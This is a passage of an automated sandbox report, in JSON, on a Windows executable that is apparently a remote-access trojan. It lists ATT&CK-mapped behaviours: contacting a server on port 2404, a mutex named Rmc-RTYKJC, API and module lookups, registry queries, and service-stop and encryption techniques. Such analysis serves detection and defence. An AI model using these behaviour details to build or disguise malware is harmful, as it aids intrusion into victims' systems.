"attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 748E0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-RTYKJC\"\n \"Rmc-RTYKJC\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 703c0000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"KERNEL32\" at base 75f50000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc00000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"RPCRT4.DLL\" at base 75550000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"KERNEL32.DLL\" at base 75f50000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75f10000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74790000\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 742f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005260)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75550000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005260)\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005260)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b516b@Iphlpapi.DLL\"\n \"0f001000dc4b516b@Iphlpapi.DLL\"\n \"0c000d00244c516b@Iphlpapi.DLL\"\n \"140015006c4c516b@Iphlpapi.DLL\"\n \"0c000d00e04c516b@Iphlpapi.DLL\"\n \"15001600c03e516b@ADVAPI32.dll\"\n \"0e000f00703f516b@ADVAPI32.dll\"\n \"0e000f00cc3f516b@ADVAPI32.dll\"\n \"11001200b447516b@ADVAPI32.dll\"\n \"110012004848516b@ADVAPI32.dll\"\n \"120013008c48516b@ADVAPI32.dll\"\n \"12001300e448516b@ADVAPI32.dll\"\n \"14001500dc6f516b@ADVAPI32.dll\"\n \"14001500f46f516b@ADVAPI32.dll\"\n \"140015000c70516b@ADVAPI32.dll\"\n \"170018002470516b@ADVAPI32.dll\"\n \"0d000e003c70516b@ADVAPI32.dll\"\n \"110012004c70516b@ADVAPI32.dll\"\n \"110012006070516b@ADVAPI32.dll\"\n \"0d000e00f066516b@WININET.dll\"\n \"0d000e006067516b@WININET.dll\"\n \"100011009867516b@WININET.dll\"\n \"100011003c68516b@WININET.dll\"\n \"10001100a470516b@WININET.dll\"\n \"10001100b870516b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:2404\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has an writable section named \".data\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has an writable section named \".tls\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has an writable section named \"rqmsa\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\Rstrtmgr.DLL\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\RMC-RTYKJC\\\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\RMC-RTYKJC\"; Key: \"CLXWSUYH\"; Value: \"\")\n \"1ef1da97a3fae7e228e8b74aea5b37ad948bcad3054e24b4125782ecb3c82ce8.exe\" (Access type: \"QUERYVAL\"; Path: 